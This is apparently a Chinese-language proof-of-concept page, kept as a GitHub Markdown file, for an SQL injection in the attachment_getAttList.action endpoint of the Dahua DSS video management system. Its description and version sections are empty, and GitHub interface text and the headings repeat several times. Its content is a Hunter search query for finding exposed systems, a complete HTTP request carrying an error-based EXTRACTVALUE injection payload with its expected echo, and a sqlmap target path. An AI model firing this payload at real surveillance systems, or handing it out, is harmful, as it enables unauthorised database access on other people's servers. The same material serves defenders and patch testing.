大华 DSS 视频管理系统attachment_getAttList存在SQL注入漏洞

一、漏洞简介

二、影响版本

大华 DSS 视频管理系统

三、资产测绘

hunter：app.name=="Dahua 大华 DSS 视频管理系统"

登录页面

四、漏洞复现

GET /portal/attachment_getAttList.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x5c,0x716b6b6b71,(SELECT%20(ELT(8841=8841,1))),0x7178786271))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

qkkkq1qxxbq

sqlmap

/portal/attachment_getAttList.action?bean.RecId=1&bean.TabName=1

更新: 2024-04-28 16:08:12
原文: https://www.yuque.com/xiaokp7/ocvun2/fqfir04lszoxzfkb

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md

大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md

大华 DSS 视频管理系统attachment_getAttList存在SQL注入漏洞

一、漏洞简介

二、影响版本

三、资产测绘

四、漏洞复现

Files

大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md

Latest commit

History

大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md

File metadata and controls

大华 DSS 视频管理系统attachment_getAttList存在SQL注入漏洞

一、漏洞简介

二、影响版本

三、资产测绘

四、漏洞复现